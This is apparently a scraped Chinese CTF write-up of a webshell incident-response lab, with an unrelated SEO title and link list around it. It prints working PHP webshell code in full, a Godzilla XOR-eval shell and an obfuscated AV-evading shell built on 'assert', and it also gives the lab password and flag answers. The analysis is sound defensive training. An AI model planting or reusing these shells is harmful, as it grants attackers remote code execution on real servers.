当前位置: 首页 > wzjs >正文

阿里云买啦域名怎么建设网站百度搜索流量查询

阿里云买啦域名怎么建设网站,百度搜索流量查询,wordpress实时预览载入中,怎样做网站用的大于9kb玄机——第一章 应急响应-webshell排查 目录 玄机——第一章 应急响应-webshell排查1、黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}2、黑客使用的什么工具的shell github地址的md5 flag{md5}3、黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx…

玄机——第一章 应急响应-webshell排查

目录

  • 玄机——第一章 应急响应-webshell排查
    • 1、黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
    • 2、黑客使用的什么工具的shell github地址的md5 flag{md5}
    • 3、黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
    • 4、黑客免杀马完整路径 md5 flag{md5}

简介:

靶机账号密码 root xjwebshell
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}

1、黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}

将/var/www/html整个打包下来: tar -czvf html.tar.gz ./

将打包的后的源码放入D盾扫描,得到4个可疑文件:

在这里插入图片描述

逐个分析,最终在gz.php中看到了一行注释:

在这里插入图片描述

因此,flag{027ccd04-5065-48b6-a32d-77c704a5e26d}

2、黑客使用的什么工具的shell github地址的md5 flag{md5}

$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){$data=encode($data,$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if (strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo encode(@run($data),$key);}else{if (strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}

这是一段哥斯拉的webshell,它的项目地址是https://github.com/BeichenDream/Godzilla,转成md5即可:

在这里插入图片描述

因此,flag{39392de3218c333f794befef07ac9257}

3、黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx

让我们找出隐藏shell,我们可以在D盾的扫描结果中发现一个.Mysqli.php 的隐藏文件:

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$payloadName='payload';
$key='3c6e0b8a9c15224a';
$data=file_get_contents("php://input");
if ($data!==false){$data=encode($data,$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if (strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo encode(@run($data),$key);}else{if (strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}

里面依旧是哥斯拉的webshell,从它的key值依旧为3c6e0b8a9c15224a也可以看出。

那么将转为md5即可,文件路径为:/var/www/html/include/Db/.Mysqli.php,转成md5:

在这里插入图片描述

因此,flag{aebac0e58cd6c5fad1695ee4d1ac1919}

4、黑客免杀马完整路径 md5 flag{md5}

让我们找出免杀马,将这几个文件丢入沙箱看看,发现只有top.php没有报毒:

在这里插入图片描述

于是看看top.php的代码逻辑:

<?php$key = "password";//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){$fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);

这段代码用户通过URL传递两个参数func和func2。

func:经过Base64编码的字符串,解码后会被异或解密。func2:用于动态构造函数名。

通过这两个可控的参数,我们可以构造以下语句:

<?phperror_reporting(0);$key = "password";//ERsDHgEUC1hI
$fun = base64_decode('ERsDHgEUC1hI');
for($i=0;$i<strlen($fun);$i++){$fun[$i] = $fun[$i]^$key[$i+1&7];
}$a = "a";
$s = "s";
$c=$a.$s.'sert';
echo $c."(".$fun.")";

在这里插入图片描述

因此,flag就是把该文件路径转成md5值即可:flag{eeff2eabfd9b7a6d26fc1a53d3f7d1de}

在这里插入图片描述

http://www.dtcms.com/wzjs/230014.html

相关文章:

  • 微网站建设高端网站定制慈溪seo
  • 西安本地十家做网站建设的公司网络公司
  • 宣传手册内容模板网站关键词排名优化电话
  • 重庆网络网站建设百度推广合作
  • 茂名市电白区住房和城乡建设局网站seo门户网站优化
  • 政务网站开发合同seo工作内容和薪资
  • 南昌做网站和微信小程序的公司个人外包接单平台
  • 天津做网站优化哪家好域名停靠网页app推广大全
  • 政府网站 cms百度开户渠道商哪里找
  • aspnet做网站视频教程防疫管控优化措施
  • 做绒毛鉴定网站服务营销
  • 排名前十的网页游戏抚州seo排名
  • 京东网上商城创立时间seo对网站优化
  • 当今社会网站开发的重要性郑州网络运营培训
  • 亚马逊网站建设网络舆情管控
  • 网站备案要求百度学术论文查重入口
  • 教人做辐射4mod的网站seo营销课程培训
  • 做优化b2b网站口碑营销的步骤
  • 陕西西安整站优化cms
  • 湖南奶茶加盟网站建设seo网站优化推广怎么样
  • 黄骅网站建设价格免费十大软件大全下载安装
  • 广州做网站建设安卓优化大师最新版下载
  • b2c网站开发天眼查企业查询入口
  • 关于WordPress的摘要优化关键词的方法
  • 做虾皮网站赚钱吗百度服务中心投诉
  • 北京微网站建设设计服务淘宝关键词指数查询
  • 哪里做网站做的好今日新闻消息
  • 哪个网站专门做政策解读b2b网站排名
  • 网站策划方案目标企业官网
  • 北京城乡建设门户网站网络营销的职能有哪些